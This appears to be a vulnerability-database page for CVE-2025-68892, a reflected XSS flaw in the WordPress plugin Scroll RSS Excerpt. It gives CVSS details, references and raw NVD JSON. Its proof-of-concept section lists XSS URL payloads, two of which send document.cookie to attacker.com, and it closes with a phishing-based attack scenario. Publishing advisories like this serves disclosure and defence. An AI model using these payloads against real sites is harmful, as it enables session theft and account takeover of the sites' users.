CVE-2025-68892

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in [email protected] Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS.This issue affects Scroll rss excerpt: from n/a through <= 5.0.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Scroll RSS Excerpt <= 5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-68892 Reflected XSS PoC for WordPress Scroll RSS Excerpt Plugin -->
<!-- Attack URL: Inject JavaScript via URL parameter -->

<!-- Basic XSS PoC -->
http://target-site.com/?s=<script>alert(document.domain)</script>

<!-- Cookie Stealing PoC -->
http://target-site.com/?s=<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Session Hijacking PoC -->
http://target-site.com/?s=<script>document.location='https://attacker.com/log?cookie='+document.cookie</script>

<!-- DOM-based XSS PoC -->
http://target-site.com/?s=<svg/onload=alert(document.cookie)>

<!-- Real-world attack scenario -->
<!-- 
1. Attacker crafts malicious URL with XSS payload
2. Attacker sends phishing email with the malicious link
3. Victim clicks the link
4. Malicious JavaScript executes in victim's browser
5. Attacker steals session cookies or performs actions as victim
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68892
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68892
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68892/
[4] VulDB https://vuldb.com/cve/CVE-2025-68892
[5] https://patchstack.com/database/Wordpress/Plugin/scroll-rss-excerpt/vulnerability/wordpress-scroll-rss-excerpt-plugin-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68892", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:54.483", "lastModified": "2026-04-27T19:16:37.437", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in [email protected] Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS.This issue affects Scroll rss excerpt: from n/a through <= 5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/scroll-rss-excerpt/vulnerability/wordpress-scroll-rss-excerpt-plugin-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}